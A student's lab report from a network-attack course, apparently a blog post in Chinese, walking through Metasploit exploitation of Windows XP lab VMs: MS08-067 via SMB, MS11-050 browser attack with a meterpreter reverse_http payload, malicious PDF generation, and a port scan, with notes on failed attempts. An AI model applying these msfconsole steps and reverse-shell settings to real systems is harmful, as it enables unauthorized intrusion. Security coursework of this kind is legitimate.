• 20155317 王新玮《网络对抗技术》实验5 MSF基础应用


    20155317 王新玮《网络对抗技术》实验5 MSF基础应用

    1. MS08_067安全漏洞

    • 原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行。

    实验步骤

    首先进入msf控制台,对漏洞MS08_067进行信息搜索。目的是为了获取模块名,以便之后的设置需要。所以,在本次的实验中,我们首先需要对这个攻击模块进行查询,搜索,了解之后再进行相关的配置。

    search ms08_067

    查询完成之后,我们选择相应的路径进行使用,use + 路径

     之后,我们使用show payloads 来查看有哪些相关载体

    show payloads
    

      

     

    如图所示,我们选中相应载体,进行使用

     

    完成后,我们设置相关的参数

     set LHOST 192.168.130.130 //本机IP
    
     set LPORT 5317 //设置连接端口
    
     set RHOST 192.168.130.133 //想攻击的主机的IP
    
     set target 0 //自动寻找目标 AUTO
    
     exploit //攻击
    

    在设置好相关参数之后,攻击成功。

    还有一点:在第一遍尝试的时候,我并没有成功的直接获取到shell,后来发现是windows没有关闭防火墙,后来关闭防火墙之后,便顺利成功了

    2.浏览器渗透攻击——MS11-050

    在完成这个实验之前,我下载并使用了狄老师提供的XP虚拟机。在开始使用时,我发现了。。。。

    我以为这是狄老师留给我们的闯关秘籍,说不定看看就能懂得所有套路,完成所有实验。我打开后。。

    虚拟机已崩塌。。。。。连任务管理器都关不了。。。。

    重启重启。。。

    okok,重启之后,实验开始。。

    根据上个实验的基本操作步骤,首先进行

    search ms11_050
    

    完成后,我们开始设置相关参数

     set payload windows/meterpreter/reverse_http //http反向回连
    
     set LHOST 192.168.130.130 //攻击机ip
    
     set LPORT 5303 //攻击端口固定
    
     set URIPATH 2015dwj //统一资源标识符路径设置
    
     exploit

     

    完成之后,我们在xp虚拟机的ie浏览器里输入Local IP

    这个出现了错误,kali 没有获得相关的shell

    看了狄老师的博客,发现也没有解决这个问题,我在找为什么失败,如果是IE版本没有问题的话,那可能是在某些浏览器设置上出现了问题,还在解决。。。

    3. adobe_pdf_phoneix_exec,PDF阅读器攻击

    老步骤,首先我们需要寻找adobe相关的攻击漏洞search 一下

    我们选取了这个作为攻击手段吧。感觉前面有excellent ,应该攻击挺容易吧

    用show option 看一下相关的参数。

    我们发现它一共需要三个,其中两个已经有了通常性设置了,所以只需要设置RHOST即可

    我们用exploit执行之后,发现提示unreachable,应该是不能ping通

    后来测试发现是可以ping通的,但不知道为什么不成功,攻击失败。。。。

    4.  windows/fileformat/adobe_cooltype_sing

    本次我又开始其他的尝试

    老规矩,复制粘贴,show option ,让我看看你需要啥

    设置好相关参数,exploit创建pdf

    这次十分顺利,创建成功,接下来,我们将其导入xp内部

    啊!!!经过几次虚拟机的崩塌以及wm的崩塌,pdf终于到了xp上了。。。惊心动魄的时刻终于来了!

    唉。。。没有成功,可能这个版本不对吧,我再从网上找找其他版本。。哎。。难受,咋就不成功呢。

    补:后来经过老师的帮助,我发现,自己产生的这个pdf并不能够产生回连,在运行该程序之后,用netstat命令之后,查不到当时的连接情况

    为了排除到底是哪里出的问题,我运行了狄老师的pdf,并用netstat命令查看连接,发现狄老师的可以存在连接

    这就说明,是我的pdf文件生成的有问题,但是如果是我配置出问题的话,也一定会存在连接的情况。所以我利用同学的电脑,做了一下本次的实验,最后也取得了成功。

    4.1补充实验:(用自己电脑)

     在狄老师给虚拟机中,狄老师已经有了相应的pdf文件,其实也可以不用生成,只把kali的ip改一下,把端口设置成狄老师所设置的端口就可以,从开始抓包的时候我们可以看出,狄老师设置的回连IP为192.168.220.130 端口为5303,所以我们按照这个设置一下:

    修改IP:

    在这边设置好了之后,在xp上我点开了pdf文件,发现并没有出现回连的情况,没有获得windows shell,此时我我用netstat命令进行查看,我发现连接的情况变成了其他样子。

     

    之前的:

    情况十分怪异,但是从原理上来讲,这样修改更改IP和配置端口是可以使用狄老师的pdf文件的。

    5.0 use auxiliary/scanner/portscan/tcp

     

    这个模块是查看端口的开放情况,在这里我们只扫描了一个主机,查看了其1-6000端口的开放情况。

    实验总结

                通过本次实验,我了解了更多的攻击方法和一些漏洞的使用情况,其实漏洞哪里都有,系统、软件这些都可以存在漏洞,以前我觉得我的本机在更新office的漏洞没啥用,现在看来,还是好好更新吧。在这个实验中也出现了很多问题,出现了这种不能回连的怪异的情况,也学会了很多解决问题和分析问题的方法,在这个实验中,首先排出了xp的问题,后来又排除了kali的问题,虽然最后没有解决,但是也收获多多。

      

      

  • 相关阅读:
    [Linux]Ubuntu下正确挂载NTFS磁盘的方法
    Google搜索指令与自定义引擎
    【Linux】Android手机在Ubuntu上无法被adb识别解决办法(权限相关)
    [ Linux ] Remove PPA source from your pc
    一键去除 UC浏览器 论坛模式 内置的广告
    Huawei U8825d 对4G手机内存重新分区过程[把2Gb内置SD卡容量划分给DATA分区使用]
    【Android】把Linux GCC安插在Android手机上
    [Windows]隐藏文件及目录的命令
    Linux压缩包简体中文乱解决方案[全]
    修改su密码 macbook
  • 原文地址:https://www.cnblogs.com/wxwddp/p/8881536.html
Copyright © 2020-2023  润新知